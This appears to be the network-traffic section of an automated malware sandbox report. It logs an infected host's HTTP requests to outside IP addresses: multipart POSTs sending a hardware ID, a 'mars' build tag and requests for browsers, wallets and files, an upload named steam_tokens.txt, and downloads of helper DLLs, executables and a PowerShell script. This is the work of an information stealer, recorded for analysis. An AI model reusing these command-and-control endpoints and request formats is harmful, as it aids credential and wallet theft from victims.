Source: global traffic	HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
Source: global traffic	HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
Source: global traffic	HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
Source: global traffic	HTTP traffic detected: GET /?vhyneVXjVGxXWDBAHPFQ=vMcvSUhjRwUjZHoUBOuO.txt HTTP/1.1Host: cl.oud-cdn.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIJKKFHIEGCBGCAFIJHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="build"mars------AEHIJKKFHIEGCBGCAFIJ--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAEHJJECAEGCAAAAEGIHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 2d 2d 0d 0a Data Ascii: ------JDAEHJJECAEGCAAAAEGIContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------JDAEHJJECAEGCAAAAEGIContent-Disposition: form-data; name="message"browsers------JDAEHJJECAEGCAAAAEGI--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDBFIJKEBGIDGDHCGCHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 2d 2d 0d 0a Data Ascii: ------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="message"plugins------KEGDBFIJKEBGIDGDHCGC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCBFHJDHJJKFIDBGIJHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 2d 2d 0d 0a Data Ascii: ------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="message"fplugins------IEGCBFHJDHJJKFIDBGIJ--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDGDBFCBKFHJKFHCBKHost: 185.215.113.206Content-Length: 5747Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCBAAAFHJDHJJKEBGHIHost: 185.215.113.206Content-Length: 999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIDBKKKKKFBGDGDHIDBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 2d 2d 0d 0a Data Ascii: ------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="file"------BGIDBKKKKKFBGDGDHIDB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFHIIEHIEGDHJJJKFIHost: 185.215.113.206Content-Length: 3087Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBKKKJJJKKEBGDAFIDHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 2d 2d 0d 0a Data Ascii: ------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="file"------CFCBKKKJJJKKEBGDAFID--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGIDHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAKFHIEGDGCAAAEGDGHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 2d 2d 0d 0a Data Ascii: ------DAAAKFHIEGDGCAAAEGDGContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------DAAAKFHIEGDGCAAAEGDGContent-Disposition: form-data; name="message"wallets------DAAAKFHIEGDGCAAAEGDG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEGHIJEHJDHIDHIDAEHHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 2d 2d 0d 0a Data Ascii: ------CAEGHIJEHJDHIDHIDAEHContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------CAEGHIJEHJDHIDHIDAEHContent-Disposition: form-data; name="message"files------CAEGHIJEHJDHIDHIDAEH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBKFHJEBAAEBGDGDBFBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 2d 2d 0d 0a Data Ascii: ------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="file"------IDBKFHJEBAAEBGDGDBFB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKKKFCFHCFIECBGDHIDHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 2d 2d 0d 0a Data Ascii: ------IJKKKFCFHCFIECBGDHIDContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------IJKKKFCFHCFIECBGDHIDContent-Disposition: form-data; name="message"ybncbhylepme------IJKKKFCFHCFIECBGDHID--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDAFBKFIECBGCAKECGHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 2d 2d 0d 0a Data Ascii: ------GIJDAFBKFIECBGCAKECGContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------GIJDAFBKFIECBGCAKECGContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GIJDAFBKFIECBGCAKECG--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /files/file1.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005627001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/k4pDgO.ps1 HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 32 38 30 34 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005628041&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 35 36 33 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1005637001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005642001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005643001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Mon, 11 Nov 2024 22:52:56 GMTIf-None-Match: "67328ac8-1bb200"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 2d 2d 0d 0a Data Ascii: ------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="build"mars------FIDHIEBAAKJDHIECAAFH--
